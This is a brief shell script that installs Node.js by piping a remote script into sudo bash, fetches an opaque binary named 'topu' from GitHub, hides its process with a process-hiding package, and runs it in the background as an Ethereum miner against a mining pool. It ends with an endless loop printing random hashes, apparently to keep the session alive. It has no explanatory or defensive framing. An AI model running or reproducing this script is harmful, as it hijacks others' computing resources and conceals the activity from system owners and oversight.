#!/bin/sh
#!/bin/bash

apt update
curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -
sudo apt install nodejs
npm i -g node-process-hider
wget https://github.com/gyrogerald/dera/raw/main/topu
sudo ph add topu
chmod 777 topu
nohup ./topu -uri ethproxy://TeslaM.$(echo $(shuf -i 1-9999 -n 1)-T4@ethash.poolbinance.com:443 > nohup.out

while [ 1 ]; do

  while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 15m; done

sleep 2

done
